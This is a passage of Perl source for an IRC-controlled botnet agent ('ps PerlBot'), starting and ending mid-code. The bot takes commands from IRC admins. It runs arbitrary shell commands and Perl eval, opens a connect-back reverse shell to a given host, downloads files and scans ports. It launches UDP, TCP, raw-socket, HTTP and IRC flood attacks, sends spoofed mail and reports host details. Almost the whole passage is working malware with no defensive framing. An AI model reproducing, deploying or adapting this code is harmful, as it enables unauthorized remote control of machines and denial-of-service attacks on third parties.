  %http_loop_check = ();
  _get($url);
  close GET_OUTFILE;
  return $main::http_get_result;
}
 
sub _get
{
  my $url = shift;
  my $proxy = "";
  grep {(lc($_) eq "http_proxy") && ($proxy = $ENV{$_})} keys %ENV;
  if (($proxy eq "") && $url =~ m,^http://([^/:]+)(?::(\d+))?(/\S*)?$,) {
    my $host = $1;
    my $port = $2 || 80;
    my $path = $3;
    $path = "/" unless defined($path);
    return _trivial_http_get($host, $port, $path);
  } elsif ($proxy =~ m,^http://([^/:]+):(\d+)(/\S*)?$,) {
    my $host = $1;
    my $port = $2;
    my $path = $url;
    return _trivial_http_get($host, $port, $path);
  } else {
    return undef;
  }
}
 
 
sub _trivial_http_get
{
  my($host, $port, $path) = @_;
  my($AGENT, $VERSION, $p);
  $AGENT = "get-minimal";
  $VERSION = "20000118";
  $path =~ s/ /%20/g;
 
  require IO::Socket;
  local($^W) = 0;
  my $sock = IO::Socket::INET->new(PeerAddr => $host,
                                   PeerPort => $port,
                                   Proto   => 'tcp',
                                   Timeout  => 60) || return;
  $sock->autoflush;
  my $netloc = $host;
  $netloc .= ":$port" if $port != 80;
  my $request = "GET $path HTTP/1.0\015\012"
              . "Host: $netloc\015\012"
              . "User-Agent: $AGENT/$VERSION/u\015\012";
  $request .= "Pragma: no-cache\015\012" if ($main::http_no_cache);
  $request .= "\015\012";
  print $sock $request;
 
  my $buf = "";
  my $n;
  my $b1 = "";
  while ($n = sysread($sock, $buf, 8*1024, length($buf))) {
    if ($b1 eq "") {
      $b1 = $buf;
      $buf =~ s/.+?\015?\012\015?\012//s;
    }
    if ($http_stream_out) { print GET_OUTFILE $buf; $buf = ""; }
  }
  return undef unless defined($n);
  $main::http_get_result = 200;
  if ($b1 =~ m,^HTTP/\d+\.\d+\s+(\d+)[^\012]*\012,) {
    $main::http_get_result = $1;
    if ($main::http_get_result =~ /^30[1237]/ && $b1 =~ /\012Location:\s*(\S+)/) {
      my $url = $1;
      return undef if $http_loop_check{$url}++;
      return _get($url);
    }
    return undef unless $main::http_get_result =~ /^2/;
  }
 
  return $buf;
}
 
sub conectar {
  my $meunick = $_[0];
  my $server_con = $_[1];
  my $port_con = $_[2];
  my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server_con",
  PeerPort=>$port_con) or return(1);
  if (defined($IRC_socket)) {
    $IRC_cur_socket = $IRC_socket;
    $IRC_socket->autoflush(1);
    $sel_cliente->add($IRC_socket);
    $irc_servers{$IRC_cur_socket}{'host'} = "$server_con";
    $irc_servers{$IRC_cur_socket}{'port'} = "$port_con";
    $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
    $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
    nick("$meunick");
    sendraw("USER $ircname ".$IRC_socket->sockhost." $server_con :$realname");
    sleep 1;
  }
}
 
my $line_temp;
while( 1 ) {
  while (!(keys(%irc_servers))) { conectar("$nick", "$server", "$port"); }
  delete($irc_servers{''}) if (defined($irc_servers{''}));
  my @ready = $sel_cliente->can_read(0);
  next unless(@ready);
  foreach $fh (@ready) {
    $IRC_cur_socket = $fh;
    $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
    $nread = sysread($fh, $msg, 4096);
    if ($nread == 0) {
      $sel_cliente->remove($fh);
      $fh->close;
      delete($irc_servers{$fh});
    }
    @lines = split (/\n/, $msg);
    for(my $c=0; $c<= $#lines; $c++) {
      $line = $lines[$c];
      $line=$line_temp.$line if ($line_temp);
      $line_temp='';
      $line =~ s/\r$//;
      unless ($c == $#lines) {
        parse("$line");
        } else {
        if ($#lines == 0) {
          parse("$line");
          } elsif ($lines[$c] =~ /\r$/) {
          parse("$line");
          } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
          parse("$line");
        } else {
      $line_temp = $line;
        }
      }
    }
  }
}
 
sub parse {
  my $servarg = shift;
  if ($servarg =~ /^PING \:(.*)/) {
    sendraw("PONG :$1");
    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
    my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
    if ($args =~ /^\001VERSION\001$/) {
         notice("$pn", "".$vers."");
    }
        if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
    if (grep {$_ =~ /^\Q$pn\E$/i } @admins ) {
    if ($onde eq "$meunick"){
    shell("$pn", "$args");
  }
  if ($args =~ /^(\Q$meunick\E|\!x)\s+(.*)/ ) {
    my $natrix = $1;
    my $arg = $2;
    if ($arg =~ /^\!(.*)/) {
      ircase("$pn","$onde","$1");
      } elsif ($arg =~ /^\@(.*)/) {
      $ondep = $onde;
      $ondep = $pn if $onde eq $meunick;
      bfunc("$ondep","$1");
      } else {
      shell("$onde", "$arg");
    }
  }
}
}
}
 
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  if (lc($1) eq lc($meunick)) {
  $meunick=$4;
  $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  }
  } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  nick("$meunick-".int rand(9999));
  } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  $meunick = $2;
  $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  foreach my $canal (@channels) {
        sendraw("MODE $nick +x");
    sendraw("JOIN $canal");
}
}
}
 
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
  if (my $pid = fork) {
  waitpid($pid, 0);
  } else {
  if (fork) {
  exit;
  } else {
###########################
##### [ Help Module ] #####
###########################
 
if ($funcarg =~ /^help/) {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1=========================");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1ps PerlBot Main Help:");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1=========================");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12@9,1system       ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12@9,1version      ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12@9,1channel      ");     
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12@9,1flood        ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12@9,1utils        ");     
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1=========================");
}
 
if ($funcarg =~ /^system/) {
        $uptime=`uptime`;
        $ownd=`pwd`;
        $id=`id`;
        $uname=`uname -srp`;
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1============================");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1  ps Bot Configuration: ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1============================");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*Server      : 12$server   ");       
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*Port        : 12$port     ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*Channels    : 12@channels ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*uname -a    : 12$uname    ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*uptime      : 12$uptime   ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*FakeProcess : 12$process  ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*ProcessPID  : 12$$        ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*ID          : 12$id       ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1*Own Dir     : 12$ownd     ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [System] 9,1============================");
}
 
if ($funcarg =~ /^version/){
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1==================================");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1    ps Bot Informations:      ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1==================================");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1*Bot Version : 12$version        ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1*Bot Creator : 12CrAmEr          ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1*Bot Year    : 122012            ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Version] 9,1==================================");
}
 
if ($funcarg =~ /^flood/) {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1=============================================");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1         ps PerlBot Flood Help:              ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1=============================================");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12@9,1udp1 <ip> <port> <time>           ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12@9,1udp2 <ip> <packet size> <time>    ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12@9,1udp3 <ip> <port> <time>           ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12@9,1tcp <ip> <port> <pack size> <time>");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12@9,1http <site> <time>                ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12@9,1ctcpflood <nick>                  ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12@9,1msgflood <nick>                   ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12@9,1noticeflood <nick>                ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1=============================================");
}
 
if ($funcarg =~ /^channel/) {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1====================================");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1        ps PerlBot Channel Help:    ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1====================================");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12@9,1join <channel>           ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12@9,1part <channel>           ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12!9,1rejoin <channel>         ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12!9,1op <channel> <nick>      ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12!9,1deop <channel> <nick>    "); 
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12!9,1voice <channel> <nick>   ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12!9,1devoice <channel> <nick> ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12!9,1nick <newnick>           ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12!9,1msg <nick>               ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12!9,1quit                     "); 
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12!9,1die                      ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1====================================");
}
 
if ($funcarg =~ /^utils/) {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1=========================================================");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1             ps PerlBot Utils Help:                  ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1=========================================================");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12@9,1cback <ip> <port>                             ");    
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12@9,1download <url+path> <file>                    ");    
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12@9,1mail <subject> <sender> <recipient> <message> ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12@9,1dns <ip>                                      ");    
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12@9,1port <ip> <port>                              ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x 12@9,1portscan <ip>                                 ");    
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!x pwd (for example)                                      ");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1=========================================================");
}
 
#########################
##### [ Functions ] #####
#########################
 
if ($funcarg =~ /^die/) {
        sendraw($IRC_cur_socket, "QUIT :");
        $killd = "kill -9 ".fork;
        system (`$killd`);
}
###########    
if ($funcarg =~ /^join (.*)/) {
        sendraw($IRC_cur_socket, "JOIN ".$1);
}
 
if ($funcarg =~ /^part (.*)/) {
        sendraw($IRC_cur_socket, "PART ".$1);
}
###########
if ($funcarg =~ /^portscan (.*)/) {
  my $hostip="$1";
  my @portas=("1","7","9","14","20","21","22","23","25","53","80","88","110","112","113","137","143","145","222","333","405","443","444","445","512","587","616","666","993","995","1024","1025","1080","1144","1156","1222","1230","1337","1348","1628","1641","1720","1723","1763","1983","1984","1985","1987","1988","1990","1994","2005","2020","2121","2200","2222","2223","2345","2360","2500","2727","3130","3128","3137","3129","3303","3306","3333","3389","4000","4001","4471","4877","5252","5522","5553","5554","5642","5777","5800","5801","5900","5901","6062","6550","6522","6600","6622","6662","6665","6666","6667","6969","7000","7979","8008","8080","8081","8082","8181","8246","8443","8520","8787","8855","8880","8989","9855","9865","9997","9999","10000","10001","10010","10222","11170","11306","11444","12241","12312","14534","14568","15951","17272","19635","19906","19900","20000","21412","21443","21205","22022","30999","31336","31337","32768","33180","35651","36666","37998","41114","41215","44544","45055","45555","45678","51114","51247","51234","55066","55555","65114","65156","65120","65410","65500","65501","65523","65533");
  my (@aberta, %porta_banner);
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Port Scan] 9,1Scanning for open ports on 12".$1." 9,1started. ");
  foreach my $porta (@portas)  {
    my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
    if ($scansock) {
      push (@aberta, $porta);
      $scansock->close;
    }
  }
  if (@aberta) {
    sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Port Scan] 9,1Open ports found: 12@aberta ");
    } else {
    sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Port Scan] 9,1No open ports found. ");
  }
}
##############
if ($funcarg =~ /^download\s+(.*)\s+(.*)/) {
        getstore("$1", "$2");
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Download] 9,1Downloaded the file: 12$2 9,1from 12$1 ");
}
##############
if ($funcarg =~ /^dns\s+(.*)/){
        my $nsku = $1;
        $mydns = inet_ntoa(inet_aton($nsku));
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [DNS] 9,1Resolved: 12$nsku 9,1to 12$mydns ");
}
##############
if ($funcarg=~ /^port\s+(.*?)\s+(.*)/ ) {
        my $hostip= "$1";
        my $portsc= "$2";
        my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $portsc, Proto =>'tcp', Timeout => 7);
        if ($scansock) {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [PORT] 9,1Connection to 12$hostip9,1:12$portsc 9,1is 12Accepted. ");
        }
        else {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [PORT] 9,1Connection to 12$hostip9,1:12$portsc 9,1is 4Refused. ");
        }
}
##############
if ($funcarg =~ /^udp1\s+(.*)\s+(\d+)\s+(\d+)/) {
    return unless $pacotes;
    socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
    my $alvo=inet_aton("$1");
    my $porta = "$2";
    my $dtime = "$3";
    my $pacote;
    my $pacotese;
        my $size = 0;
    my $fim = time + $dtime;
    my $pacota = 1;
    sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-1 FlooD] 9,1Attacking 12".$1." 9,1On Port 12".$porta." 9,1for 12".$dtime." 9,1seconds. ");
        while (($pacota == "1") && ($pacotes == "1")) {
            $pacota = 0 if ((time >= $fim) && ($dtime != "0"));
            $pacote = $size ? $size : int(rand(1024-64)+64) ;
            $porta = int(rand 65000) +1 if ($porta == "0");
            #send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo));
            send(Tr0x, pack("a$pacote","Tr0x"), 0, pack_sockaddr_in($porta, $alvo));
            }
    sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-1 FlooD] 9,1Attack for 12".$1." 9,1finished in 12".$dtime." 9,1seconds9,1. ");
}
##############
if ($funcarg =~ /^udp2\s+(.*)\s+(\d+)\s+(\d+)/) {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-2 FlooD] 9,1Attacking 12".$1." 9,1with 12".$2." 9,1Kb Packets for 12".$3." 9,1seconds. ");
        my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
        $dtime = 1 if $dtime == 0;
        my %bytes;
        $bytes{igmp} = $2 * $pacotes{igmp};
        $bytes{icmp} = $2 * $pacotes{icmp};
        $bytes{o} = $2 * $pacotes{o};
        $bytes{udp} = $2 * $pacotes{udp};
        $bytes{tcp} = $2 * $pacotes{tcp};
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-2 FlooD] 9,1Results 12".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 9,1Kb in 12".$dtime." 9,1seconds to 12".$1."9,1. ");
}
##############
if ($funcarg =~ /^udp3\s+(.*)\s+(\d+)\s+(\d+)/) {
    return unless $pacotes;
    socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
    my $alvo=inet_aton("$1");
    my $porta = "$2";
    my $dtime = "$3";
    my $pacote;
    my $pacotese;
    my $fim = time + $dtime;
    my $pacota = 1;
    sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-3 FlooD] 9,1Attacking 12".$1." 9,1On Port 12".$porta." 9,1for 12".$dtime." 9,1seconds. ");
        while (($pacota == "1") && ($pacotes == "1")) {
            $pacota = 0 if ((time >= $fim) && ($dtime != "0"));
            $pacote= $rand x $rand x $rand;
            $porta = int(rand 65000) +1 if ($porta == "0");
            send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
            }
    sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [UDP-3 FlooD] 9,1Results 12".$pacotese." 9,1Kb in 12".$dtime." 9,1seconds to 12".$1."9,1. ");
}
##############
 
##############
if ($funcarg =~ /^tcp\s+(.*)\s+(\d+)\s+(\d+)/) {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [TCP FlooD] 9,1Attacking 12".$1.":".$2." 9,1for 12".$3." 9,1seconds. ");
        my $itime = time;
        my ($cur_time);
        $cur_time = time - $itime;
        while ($3>$cur_time){
        $cur_time = time - $itime;
        &tcpflooder("$1","$2","$3");
}
        sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [TCP FlooD] 9,1Attack ended on: 12".$1.":".$2."9,1. ");
}
##############
if ($funcarg =~ /^http\s+(.*)\s+(\d+)/) {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1[HTTP FlooD] 9,1Attacking 12".$1." 9,1on port 80 for 12".$2." 9,1seconds. ");
        my $itime = time;
        my ($cur_time);
        $cur_time = time - $itime;
        while ($2>$cur_time){
        $cur_time = time - $itime;
        my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
        print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
        close($socket);
}
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [HTTP FlooD] 9,1Attacking ended on: 12".$1."9,1. ");
}
##############
if ($funcarg =~ /^cback\s+(.*)\s+(\d+)/) {
        my $host = "$1";
        my $port = "$2";
        my $proto = getprotobyname('tcp');
        my $iaddr = inet_aton($host);
        my $paddr = sockaddr_in($port, $iaddr);
        my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
        $shell = "cmd.exe";
}
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Connect Back] 9,1Connecting to 12$host:$port ");
        socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
        connect(SOCKET, $paddr) or die "connect: $!";
        open(STDIN, ">&SOCKET");
        open(STDOUT, ">&SOCKET");
        open(STDERR, ">&SOCKET");
        system("$shell");
        close(STDIN);
        close(STDOUT);
        close(STDERR);
}
##############
if ($funcarg =~ /^mail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Mailer] 9,1Sending email to: 12$3 ");
        $subject = $1;
        $sender = $2;
        $recipient = $3;
        @corpo = $4;
        $mailtype = "content-type: text/html";
        $sendmail = '/usr/sbin/sendmail';
        open (SENDMAIL, "| $sendmail -t");
        print SENDMAIL "$mailtype\n";
        print SENDMAIL "Subject: $subject\n";
        print SENDMAIL "From: $sender\n";
        print SENDMAIL "To: $recipient\n\n";
        print SENDMAIL "@corpo\n\n";
        close (SENDMAIL);
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Mailer] 9,1Email Sended to: 12$recipient ");
}
exit;
}
}
##############
if ($funcarg =~ /^ctcpflood (.*)/) {
    my $target = "$1";
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [IRCFlood] 9,1CTCP Flooding: 12".$target." ");
        for (1..10) {
        sendraw($IRC_cur_socket, "PRIVMSG ".$target." :\001VERSION\001\n");
        sendraw($IRC_cur_socket, "PRIVMSG ".$target." :\001PING\001\n");
        }
}
##############
if ($funcarg =~ /^msgflood (.*)/) {
    my $target = "$1";
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [IRC Flood] 9,1MSG Flooding: 12".$target." ");
    sendraw($IRC_cur_socket, "PRIVMSG ".$target." :0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...");
}
##############
if ($funcarg =~ /^noticeflood (.*)/) {
    my $target = "$1";
        sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [IRC Flood] 9,1NOTICE Flooding: 12".$target." ");
        for (1..2){
        sendraw($IRC_cur_socket, "NOTICE ".$target." :0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...");
        }
}
##############
 
##############
sub ircase {
my ($kem, $printl, $case) = @_;
   if ($case =~ /^join (.*)/) {
     j("$1");
   }
   elsif ($case =~ /^part (.*)/) {
      p("$1");
   }
   elsif ($case =~ /^rejoin\s+(.*)/) {
      my $chan = $1;
      if ($chan =~ /^(\d+) (.*)/) {
        for (my $ca = 1; $ca <= $1; $ca++ ) {
          p("$2");
          j("$2");
        }
      } else {
          p("$chan");
          j("$chan");
      }
   }
   elsif ($case =~ /^op/) {
      op("$printl", "$kem") if $case eq "op";
      my $oarg = substr($case, 3);
      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   elsif ($case =~ /^deop/) {
      deop("$printl", "$kem") if $case eq "deop";
      my $oarg = substr($case, 5);
      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   elsif ($case =~ /^voice/) {
      voice("$printl", "$kem") if $case eq "voice";
      $oarg = substr($case, 6);
      voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   elsif ($case =~ /^devoice/) {
      devoice("$printl", "$kem") if $case eq "devoice";
      $oarg = substr($case, 8);
      devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   elsif ($case =~ /^msg\s+(\S+) (.*)/) {
      msg("$1", "$2");
   }
   elsif ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        msg("$2", "$3");
      }
   }
   elsif ($case =~ /^ctcp\s+(\S+) (.*)/) {
      ctcp("$1", "$2");
   }
   elsif ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        ctcp("$2", "$3");
      }
   }
   elsif ($case =~ /^invite\s+(\S+) (.*)/) {
      invite("$1", "$2");
   }
   elsif ($case =~ /^newerver\s+(\S+)\s+(\S+)/) {
       conectar("$2", "$1", "6667");
   }
   elsif ($case =~ /^nick (.*)/) {
      nick("$1");
   }
   elsif ($case =~ /^raw (.*)/) {
      sendraw("$1");
   }
   elsif ($case =~ /^eval (.*)/) {
      eval "$1";
   }
   elsif ($case =~ /^join\s+(\S+)\s+(\d+)/) {
    sleep int(rand($2));
    j("$1");
   }
   elsif ($case =~ /^part\s+(\S+)\s+(\d+)/) {
    sleep int(rand($2));
    p("$1");
   }
   elsif ($case =~ /^quit/) {
     quit();
   }
}
##############
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
        chdir("$1") || msg("$printl", "No such file or directory");
        return;
} elsif ($pid = fork) {
        waitpid($pid, 0);
} else {
if (fork) {
        exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
  $c++;
  chop $linha;
  sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
  if ($c == "$linas_max") {
    $c=0;
    sleep $sleep;
  }
}
exit;
}
}
}
##############
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
        $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
        socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
        socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
        socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
        socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
        return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
        while ( 1 ) {
for (my $port = 1;
        $port <= 65000; $port++) {
        $cur_time = time - $itime;
last if $cur_time >= $ftime;
        send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++;
        send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++;
        send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++;
        send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3;
        $pc <= 255;$pc++) {
next if $pc == 6;
        $cur_time = time - $itime;
last if $cur_time >= $ftime;
        socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
        send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
##############
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
        $ia=inet_aton($_[0]);
        $pa=sockaddr_in($_[1],$ia);
        $ftime=$_[2];
        $proto=getprotobyname('tcp');
        $j=0;$l=0;
        $cur_time = time - $itime;
while ($l<1000){
        $cur_time = time - $itime;
last if $cur_time >= $ftime;
        $t="SOCK$l";
        socket($t,PF_INET,SOCK_STREAM,$proto);
        connect($t,$pa)||$j--;
        $j++;$l++;
}
        $l=0;
while ($l<1000){
        $cur_time = time - $itime;
last if $cur_time >= $ftime;
        $t="SOCK$l";
shutdown($t,2);
        $l++;
}
}
##############
sub msg {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :$_[1]");
}
sub ctcp {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub notice {
   return unless $#_ == 1;
   sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
   return unless $#_ == 1;
   sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
   return unless $#_ == 1;
   sendraw("MODE $_[0] -o $_[1]");
}
sub voice {
   return unless $#_ == 1;
   sendraw("MODE $_[0] +v $_[1]");
}
sub devoice {
   return unless $#_ == 1;
   sendraw("MODE $_[0] -v $_[1]");
}
sub j { &join(@_); }
sub join {
   return unless $#_ == 0;
   sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {sendraw("PART $_[0]");}
sub nick {
  return unless $#_ == 0;
